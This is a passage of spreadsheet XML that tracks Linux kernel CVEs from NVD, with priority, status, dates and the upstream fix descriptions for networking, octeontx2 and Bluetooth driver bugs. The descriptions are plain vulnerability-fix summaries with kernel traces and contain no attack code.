      <c r="R446" s="5" t="inlineStr"/>
      <c r="S446" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: act_skbmod: fix length calculations and avoid invalid header warnings
syzbot reported a warning in skb_network_header_len() triggered
by tcf_skbmod_act():
  !skb_transport_header_was_set(skb)
  WARNING: CPU: 0 PID: 14949 at include/linux/skbuff.h:3243 skb_network_header_len include/linux/skbuff.h:3243 [inline]
  WARNING: CPU: 0 PID: 14949 at net/sched/act_skbmod.c:55 tcf_skbmod_act+0xfe8/0x1810 net/sched/act_skbmod.c:55
There are a few issues in tcf_skbmod_act():
1. Calling skb_network_header_len() assumes skb-&gt;transport_header is set,
   which is not guaranteed when tcf_skbmod_act() runs at TC ingress.
2. Unconditionally calling skb_mac_header_len() at the beginning of
   tcf_skbmod_act() triggers a warning on L3 devices (e.g. TUN) where the
   MAC header is unset, evaluating to an underflowed garbage length.
3. On TC ingress, skb-&gt;data points to the network header. Adding the MAC
   header length to the IP header length causes skb_ensure_writable() to
   request more bytes than the actual IP packet length, dropping valid
   short packets (e.g. 28-byte UDP/IPv4 packets).
Fix these by:
- Using skb_network_offset(skb) + sizeof(struct iphdr/ipv6hdr) for
  SKBMOD_F_ECN so that the required length is correctly calculated on
  both ingress (offset == 0) and egress (offset == mac_len).
- Setting max_edit_len to ETH_HLEN for Ethernet header modifications
  after validating ARPHRD_ETHER.</t>
        </is>
      </c>
      <c r="T446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90078</t>
        </is>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B447" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90079</t>
        </is>
      </c>
      <c r="D447" s="5" t="inlineStr"/>
      <c r="E447" s="5" t="inlineStr"/>
      <c r="F447" s="5" t="inlineStr"/>
      <c r="G447" s="5" t="inlineStr"/>
      <c r="H447" s="5" t="inlineStr"/>
      <c r="I447" s="5" t="inlineStr"/>
      <c r="J447" s="5" t="inlineStr"/>
      <c r="K447" s="5" t="inlineStr"/>
      <c r="L447" s="5" t="inlineStr"/>
      <c r="M447" s="5" t="inlineStr"/>
      <c r="N447" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O447" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P447" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q447" s="5" t="inlineStr"/>
      <c r="R447" s="5" t="inlineStr"/>
      <c r="S447" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
octeontx2-af: fix cn20k mailbox lifetime on repeated rvu_mbox_init()
rvu_mbox_init() is called separately for AF-PF mailboxes during probe
and for AF-VF mailboxes when SR-IOV is enabled.  Each call used to
allocate a new ng_rvu object, leaking the first allocation when the
pointer was overwritten on the second call.
Sharing one ng_rvu across both paths exposed several teardown bugs:
the error path freed all cn20k mailbox DMA and kfree()d ng_rvu even
when only the failing init type should be unwound, leaving live AF-PF
mailbox memory in use after an AF-VF init failure.  mutex_init() was
also re-run on the AF-VF path while AF-PF mailbox handlers could still
hold rvu-&gt;mbox_lock.  Probe and SR-IOV failure paths did not release
cn20k mailbox DMA either, since cleanup only happened in rvu_remove().
Allocate ng_rvu once with devm_kzalloc(), initialize mbox_lock in the
same block, unwind only the mailbox memory for the failing init type,
and free cn20k mailbox DMA from the probe and pci_enable_sriov()
error paths.</t>
        </is>
      </c>
      <c r="T447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90079</t>
        </is>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B448" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90080</t>
        </is>
      </c>
      <c r="D448" s="5" t="inlineStr"/>
      <c r="E448" s="5" t="inlineStr"/>
      <c r="F448" s="5" t="inlineStr"/>
      <c r="G448" s="5" t="inlineStr"/>
      <c r="H448" s="5" t="inlineStr"/>
      <c r="I448" s="5" t="inlineStr"/>
      <c r="J448" s="5" t="inlineStr"/>
      <c r="K448" s="5" t="inlineStr"/>
      <c r="L448" s="5" t="inlineStr"/>
      <c r="M448" s="5" t="inlineStr"/>
      <c r="N448" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O448" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P448" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q448" s="5" t="inlineStr"/>
      <c r="R448" s="5" t="inlineStr"/>
      <c r="S448" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
octeontx2-pf: fix NULL deref of af_xdp_zc_qidx on rep setup
af_xdp_zc_qidx tracks receive queues using AF_XDP zero-copy and is
allocated during PF/VF probe. Representors and other non-AF_XDP paths
leave the pointer NULL, but several call sites used test_bit() on it
unconditionally.
Switching to devlink eswitch mode creates representors and runs
otx2_init_hw_resources(), which reaches otx2_pool_aq_init() and oopses
when dereferencing the NULL bitmap. Add NULL checks before every
af_xdp_zc_qidx test_bit() use in the RSS, ethtool, XSK, and pool init
paths.</t>
        </is>
      </c>
      <c r="T448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90080</t>
        </is>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B449" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90081</t>
        </is>
      </c>
      <c r="D449" s="5" t="inlineStr"/>
      <c r="E449" s="5" t="inlineStr"/>
      <c r="F449" s="5" t="inlineStr"/>
      <c r="G449" s="5" t="inlineStr"/>
      <c r="H449" s="5" t="inlineStr"/>
      <c r="I449" s="5" t="inlineStr"/>
      <c r="J449" s="5" t="inlineStr"/>
      <c r="K449" s="5" t="inlineStr"/>
      <c r="L449" s="5" t="inlineStr"/>
      <c r="M449" s="5" t="inlineStr"/>
      <c r="N449" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O449" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P449" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q449" s="5" t="inlineStr"/>
      <c r="R449" s="5" t="inlineStr"/>
      <c r="S449" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/rds: use wq_has_sleeper() in rds_cong_map_updated()
rds_cong_map_updated() runs after a peer's congestion map has been
rewritten (by rds_tcp_cong_recv() and rds_ib_cong_recv(), or the
clear-all in the loopback and IB send-completion paths).  It bumps
rds_cong_generation and then checks waitqueue_active() on
map-&gt;m_waitq and on rds_poll_waitq to decide whether anyone needs
waking.  atomic_inc() carries no ordering and waitqueue_active() is a
plain load, so nothing orders the map and generation stores before
the wait queue reads.  The waiters do the mirror image: rds_cong_wait()
adds itself to m_waitq and then tests the port bit, and rds_poll()
registers on rds_poll_waitq and then reads the generation.  That is
the store-buffering pattern described above waitqueue_active() in
include/linux/wait.h - the updater can observe an empty wait queue
while the waiter still observes the port as congested, and no wake-up
is issued.
rds_cong_wait() is an interruptible sleep with no timeout, so a
sender blocked on a congested port stays blocked until the next
congestion update from that peer arrives or a signal is delivered.
A poll() waiter misses the map-updated notification the same way.
Use wq_has_sleeper(), which is waitqueue_active() preceded by the
required full barrier, as rds_tcp_state_change() already does for
the same pattern.</t>
        </is>
      </c>
      <c r="T449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90081</t>
        </is>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B450" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90082</t>
        </is>
      </c>
      <c r="D450" s="5" t="inlineStr"/>
      <c r="E450" s="5" t="inlineStr"/>
      <c r="F450" s="5" t="inlineStr"/>
      <c r="G450" s="5" t="inlineStr"/>
      <c r="H450" s="5" t="inlineStr"/>
      <c r="I450" s="5" t="inlineStr"/>
      <c r="J450" s="5" t="inlineStr"/>
      <c r="K450" s="5" t="inlineStr"/>
      <c r="L450" s="5" t="inlineStr"/>
      <c r="M450" s="5" t="inlineStr"/>
      <c r="N450" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O450" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P450" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q450" s="5" t="inlineStr"/>
      <c r="R450" s="5" t="inlineStr"/>
      <c r="S450" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: mana: Cap MSI-X vectors to the device MSI-X table size
mana_gd_query_max_resources() sizes gc-&gt;num_msix_usable from resp.max_msix
and the CPU count, but never from the device MSI-X table. On a 1792 vCPU
M-series VM that yields 1793 while the table has 1024 entries, and
mana_gd_setup_remaining_irqs() then walks indices 1..1792, running off the
end of the region mapped by msix_map_region():
  BUG: unable to handle page fault for address: ff8e347f8b99800c
  RIP: 0010:msix_prepare_msi_desc+0x7a/0x90
  RAX: 0000000000004000 RBX: ff4330cb164ea780 RCX: ff8e347f8b998000
  Call Trace:
   &lt;TASK&gt;
   __msi_domain_alloc_irqs+0x13a/0x440
   msi_domain_alloc_irq_at+0x149/0x1b0
   mana_gd_setup+0x351/0x890
   mana_gd_probe+0x274/0x390
   &lt;/TASK&gt;
RAX is index 1024 * PCI_MSIX_ENTRY_SIZE, one entry past the table.
msi_insert_desc() does range check the index, but only against the MSI
domain hwsize, which matches the table only for devices on an MSI parent
domain. With a global PCI/MSI domain hwsize is MSI_XA_DOMAIN_SIZE, so
nothing bounds the request.
Cap num_msix_usable with pci_msix_vec_count().</t>
        </is>
      </c>
      <c r="T450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90082</t>
        </is>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B451" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90083</t>
        </is>
      </c>
      <c r="D451" s="5" t="inlineStr"/>
      <c r="E451" s="5" t="inlineStr"/>
      <c r="F451" s="5" t="inlineStr"/>
      <c r="G451" s="5" t="inlineStr"/>
      <c r="H451" s="5" t="inlineStr"/>
      <c r="I451" s="5" t="inlineStr"/>
      <c r="J451" s="5" t="inlineStr"/>
      <c r="K451" s="5" t="inlineStr"/>
      <c r="L451" s="5" t="inlineStr"/>
      <c r="M451" s="5" t="inlineStr"/>
      <c r="N451" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O451" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P451" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q451" s="5" t="inlineStr"/>
      <c r="R451" s="5" t="inlineStr"/>
      <c r="S451" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: act_ife: Only operate on Ethernet frames
act_ife encapsulates/decapsulates the original Ethernet header and uses
skb-&gt;dev-&gt;hard_header_len as the length of that header. That is only
correct for Ethernet devices: on a device where hard_header_len does not
match the L2 header that was actually pulled (PPP reports PPP_HDRLEN
while nothing is stripped on ingress), the ingress skb_push()/skb_pull()
use the wrong length and can hit skb_under_panic when headroom is tight.
IFE is Ethernet-only by design - it builds an outer ethhdr, rewrites
h_source/h_dest/h_proto, and calls eth_type_trans() on decode - so
instead of trying to make the offsets work for arbitrary link types,
simply drop packets that do not carry an Ethernet header.
Checking skb-&gt;dev-&gt;type alone is not enough. We have to cater for a
corner case where mirred can redirect an skb from a non-Ethernet device
to an Ethernet one, and skb-&gt;dev then says nothing about the framing the
skb actually has: an skb redirected from ppp0 reaches the target's ingress
hook with mac_len 0 and no Ethernet header at all. So at ingress also
require mac_len to be ETH_HLEN. On egress mac_len is not maintained, so
the device type is all we have; a bogus redirect there yields a malformed
frame rather than an out-of-bounds push, and it would be malformed with or
without IFE.
That corner case is not theoretical - redirecting from ppp0 into a veth
that has an ife encode action on its ingress hook panics without this
patch:
  skbuff: skb_under_panic: len:98 put:14 head:ffff88800e410000
          data:ffff88800e40fff5 tail:0x57 end:0x640 dev:veth3
  kernel BUG at net/core/skbuff.c:214!
  Call Trace:
   skb_push (net/core/skbuff.c:224 net/core/skbuff.c:2657)
   tcf_ife_act (net/sched/act_ife.c:829 net/sched/act_ife.c:874)
   tc_run (net/core/dev.c:4463)
   netif_receive_skb (net/core/dev.c:6463 net/core/dev.c:6522)
   tcf_mirred_to_dev (net/sched/act_mirred.c:248 net/sched/act_mirred.c:328)
   tcf_mirred_act (net/sched/act_mirred.c:489)
   tc_run (net/core/dev.c:4463)
   process_backlog (net/core/dev.c:6728)
With Ethernet framing guaranteed, use ETH_HLEN instead of
hard_header_len.</t>
        </is>
      </c>
      <c r="T451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90083</t>
        </is>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B452" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90084</t>
        </is>
      </c>
      <c r="D452" s="5" t="inlineStr"/>
      <c r="E452" s="5" t="inlineStr"/>
      <c r="F452" s="5" t="inlineStr"/>
      <c r="G452" s="5" t="inlineStr"/>
      <c r="H452" s="5" t="inlineStr"/>
      <c r="I452" s="5" t="inlineStr"/>
      <c r="J452" s="5" t="inlineStr"/>
      <c r="K452" s="5" t="inlineStr"/>
      <c r="L452" s="5" t="inlineStr"/>
      <c r="M452" s="5" t="inlineStr"/>
      <c r="N452" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O452" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P452" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q452" s="5" t="inlineStr"/>
      <c r="R452" s="5" t="inlineStr"/>
      <c r="S452" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
octeontx2-vf: fix workqueue and netdev race in probe/remove
Initialize the VF workqueue before register_netdev() so ndo_set_rx_mode
does not queue work on a NULL workqueue. Unregister the netdev before
destroying the workqueue, and add proper probe error cleanup.</t>
        </is>
      </c>
      <c r="T452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90084</t>
        </is>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B453" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90085</t>
        </is>
      </c>
      <c r="D453" s="5" t="inlineStr"/>
      <c r="E453" s="5" t="inlineStr"/>
      <c r="F453" s="5" t="inlineStr"/>
      <c r="G453" s="5" t="inlineStr"/>
      <c r="H453" s="5" t="inlineStr"/>
      <c r="I453" s="5" t="inlineStr"/>
      <c r="J453" s="5" t="inlineStr"/>
      <c r="K453" s="5" t="inlineStr"/>
      <c r="L453" s="5" t="inlineStr"/>
      <c r="M453" s="5" t="inlineStr"/>
      <c r="N453" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O453" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P453" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q453" s="5" t="inlineStr"/>
      <c r="R453" s="5" t="inlineStr"/>
      <c r="S453" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
octeontx2-af: fix NULL deref in NIX TM tree debugfs read path
rvu_dbg_nix_tm_tree_display() dereferences pfvf-&gt;sq_ctx without
checking whether the SQ context has been allocated. Reading
/sys/kernel/debug/octeontx2/nix/tm_tree for a NIX LF whose transmit
queues are not set up triggers a kernel oops.
Guard the read path the same way rvu_dbg_nix_tm_tree_write() already
does and return -EINVAL with a seq_file message when sq_ctx is NULL.</t>
        </is>
      </c>
      <c r="T453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90085</t>
        </is>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B454" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90086</t>
        </is>
      </c>
      <c r="D454" s="5" t="inlineStr"/>
      <c r="E454" s="5" t="inlineStr"/>
      <c r="F454" s="5" t="inlineStr"/>
      <c r="G454" s="5" t="inlineStr"/>
      <c r="H454" s="5" t="inlineStr"/>
      <c r="I454" s="5" t="inlineStr"/>
      <c r="J454" s="5" t="inlineStr"/>
      <c r="K454" s="5" t="inlineStr"/>
      <c r="L454" s="5" t="inlineStr"/>
      <c r="M454" s="5" t="inlineStr"/>
      <c r="N454" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O454" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P454" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q454" s="5" t="inlineStr"/>
      <c r="R454" s="5" t="inlineStr"/>
      <c r="S454" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xsk: honor XDP_TX_METADATA in zero-copy path
The zero-copy path reads TX metadata whenever the UMEM has metadata space,
even if the descriptor does not set XDP_TX_METADATA. Pass descriptor
options through the metadata helpers and ignore metadata unless the option
is set.
This does not fix the existing per-WQE metadata handling for mlx5 MPWQEs.
Only the descriptor that starts a session passes through
xsk_tx_metadata_request() and configures offload state shared by the batch.
Metadata on descriptors joining an open session is therefore not validated
and does not configure its requested offloads. In addition, a non-NULL
metadata pointer from such a descriptor is treated as a timestamp
completion request even when XDP_TXMD_FLAGS_TIMESTAMP is not set, so its
metadata union can be overwritten with an unrequested timestamp. Fixing
mixed metadata states within one MPWQE requires a separate change.</t>
        </is>
      </c>
      <c r="T454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90086</t>
        </is>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B455" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90087</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2026-09-17</t>
        </is>
      </c>
      <c r="P455" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q455" s="5" t="inlineStr"/>
      <c r="R455" s="5" t="inlineStr"/>
      <c r="S455" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: do not leak an hci_conn when a second LE connect is rejected
create_le_conn_complete() decides whether the failed connection is
still pending by comparing it against hci_lookup_le_connect(), which
returns the first LE connection in BT_CONNECT. That is the same
connection only while at most one is pending.
Two can be pending. Connections created on the passive scan path sit
in BT_CONNECT with HCI_CONN_SCANNING set and are invisible to
hci_lookup_le_connect() until hci_le_create_conn_sync() clears the
flag when their command is issued, so the -EBUSY guard in
hci_connect_le() does not prevent a second connection from being
queued while the first is still on the scan path. Whenever two
connections are in BT_CONNECT at once, the lookup may return one
connection while create_le_conn_complete() is reporting the failure
of the other; the early exit then drops the error and hci_conn_failed()
never runs on the connection that failed.
The controller also rejects a second HCI_OP_LE_CREATE_CONN issued
while another connection creation is still outstanding, per Core Spec
Vol 4, Part E. The spec calls for Command Disallowed there; the
bcm43438 observed here answers with an LMP/LL error code instead,
which bt_to_errno() maps to the -EPROTO (-71) in the log below.
The leaked connection stays in BT_CONNECT forever, and because
hci_connect_le() refuses to dial while hci_lookup_le_connect() finds
anything, every subsequent attempt to reach any peer fails with
-EBUSY and no command reaches the controller at all.
Seen on a bcm43438 with two BLE peers polled on the same interval
(state 5 is BT_CONNECT; both handles are UNSET ones, allocated from
the ida above HCI_CONN_HANDLE_MAX):
  Bluetooth: hci1: Opcode 0x2013 failed: -71
  # hcitool con
          &lt; LE 14:9C:EF:03:68:81 handle 3840 state 5 lm CENTRAL
          &lt; LE C4:D3:6A:8C:B5:38 handle 3841 state 5 lm CENTRAL
A btmon capture across the next ten minutes of connect attempts
contains no HCI_OP_LE_CREATE_CONN at all; outgoing LE connections
do not recover until the adapter is reset. With this change the same
scenario fails the rejected connection cleanly and further connects
to both peers go through.
Ask about the connection itself instead of about the device.</t>
        </is>
      </c>
      <c r="T455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90087</t>
        </is>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B456" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90088</t>
        </is>
      </c>
      <c r="D456" s="5" t="inlineStr"/>
      <c r="E456" s="5" t="inlineStr"/>
      <c r="F456" s="5" t="inlineStr"/>
      <c r="G456" s="5" t="inlineStr"/>
      <c r="H456" s="5" t="inlineStr"/>
      <c r="I456" s="5" t="inlineStr"/>
      <c r="J456" s="5" t="inlineStr"/>
      <c r="K456" s="5" t="inlineStr"/>
      <c r="L456" s="5" t="inlineStr"/>
      <c r="M456" s="5" t="inlineStr"/>
      <c r="N456" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O456" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P456" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q456" s="5" t="inlineStr"/>
      <c r="R456" s="5" t="inlineStr"/>
      <c r="S456" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: RFCOMM: Validate MTU in rfcomm_apply_pn() to prevent infinite loop
rfcomm_apply_pn() accepts the MTU value from a remote PN (Parameter
Negotiation) frame without checking for zero. When the remote peer
sends an MTU of zero, d-&gt;mtu is set to 0. This causes the sendmsg
path to enter an infinite loop when fragmenting data, as each fragment
has size == min_t(size_t, len, 0) == 0, so the remaining length never
decreases. The infinite allocation of zero-length skbs exhausts all
system memory.
Fix by clamping d-&gt;mtu to RFCOMM_DEFAULT_MTU when the negotiated
value is zero, consistent with the initial value assigned in
rfcomm_dlc_alloc().</t>
        </is>
      </c>
      <c r="T456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90088</t>
        </is>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B457" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90089</t>
        </is>
      </c>
      <c r="D457" s="5" t="inlineStr"/>
      <c r="E457" s="5" t="inlineStr"/>
      <c r="F457" s="5" t="inlineStr"/>
      <c r="G457" s="5" t="inlineStr"/>
      <c r="H457" s="5" t="inlineStr"/>
      <c r="I457" s="5" t="inlineStr"/>
      <c r="J457" s="5" t="inlineStr"/>
      <c r="K457" s="5" t="inlineStr"/>
      <c r="L457" s="5" t="inlineStr"/>
      <c r="M457" s="5" t="inlineStr"/>
      <c r="N457" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O457" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P457" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q457" s="5" t="inlineStr"/>
      <c r="R457" s="5" t="inlineStr"/>
      <c r="S457" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: btnxpuart: Validate the FW dump header length
nxp_process_fw_dump() pulls the ACL header off the frame and then reads
seq_num and buf_len from a struct nxp_fw_dump_hdr placed at skb-&gt;data,
without checking that the ACL payload is long enough to contain it.
h4_recv_buf() collects HCI_ACL_HDR_SIZE bytes of header followed by the
number of payload bytes named in that header, so skb-&gt;len is 4 + dlen
with dlen supplied by the controller and possibly smaller than the 8
byte dump header, or zero. A short frame with connection handle 0xfff
therefore reads both fields from beyond the received data.
Beyond the read itself, buf_len is what terminates a dump: a value of
zero makes the driver call hci_devcd_complete() and reset the
controller, so a truncated frame can end a dump early.
Use skb_pull_data() to validate and pull the FW dump header before
accessing its fields. Warn and reject the chunk if the header is
truncated.</t>
        </is>
      </c>
      <c r="T457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90089</t>
        </is>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B458" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90090</t>
        </is>
      </c>
      <c r="D458" s="5" t="inlineStr"/>
      <c r="E458" s="5" t="inlineStr"/>
      <c r="F458" s="5" t="inlineStr"/>
      <c r="G458" s="5" t="inlineStr"/>
      <c r="H458" s="5" t="inlineStr"/>
      <c r="I458" s="5" t="inlineStr"/>
      <c r="J458" s="5" t="inlineStr"/>
      <c r="K458" s="5" t="inlineStr"/>
      <c r="L458" s="5" t="inlineStr"/>
      <c r="M458" s="5" t="inlineStr"/>
      <c r="N458" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O458" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P458" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q458" s="5" t="inlineStr"/>
      <c r="R458" s="5" t="inlineStr"/>
      <c r="S458" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: btmtksdio: Fix out-of-bounds DMA read in the TX path
btmtksdio_tx_packet() rounds the transfer size up to the SDIO block size
of 256 bytes, but hands the host controller the SKB buffer as is:
	err = sdio_writesb(bdev-&gt;func, MTK_REG_CTDR, skb-&gt;data,
			   round_up(skb-&gt;len, MTK_SDIO_BLOCK_SIZE));
Only skb-&gt;len bytes hold packet data, so the controller reads up to 255
bytes of uninitialised memory and sends it to the device over the SDIO
bus. Depending on how much tailroom slack the SKB allocation happens to
carry, that read can also extend past the end of the buffer.
Compute the padded length up front, ensure the SKB has tailroom for it,
and zero-fill the padding with skb_put_zero(). skb-&gt;len then covers the
padding, so sdio_writesb() no longer needs to round up. byte_tx keeps
counting the header and the payload only, and the error path restores the
SKB so that the caller can requeue it.
Writing behind skb-&gt;tail is only safe because the driver owns the buffer,
which "Bluetooth: btmtksdio: Take exclusive ownership of the SKB before
TX" ensures.</t>
        </is>
      </c>
      <c r="T458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90090</t>
        </is>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B459" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90091</t>
        </is>
      </c>
      <c r="D459" s="5" t="inlineStr"/>
      <c r="E459" s="5" t="inlineStr"/>
      <c r="F459" s="5" t="inlineStr"/>
      <c r="G459" s="5" t="inlineStr"/>
      <c r="H459" s="5" t="inlineStr"/>
      <c r="I459" s="5" t="inlineStr"/>
      <c r="J459" s="5" t="inlineStr"/>
      <c r="K459" s="5" t="inlineStr"/>
      <c r="L459" s="5" t="inlineStr"/>
      <c r="M459" s="5" t="inlineStr"/>
      <c r="N459" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O459" s="5" t="inlineStr">
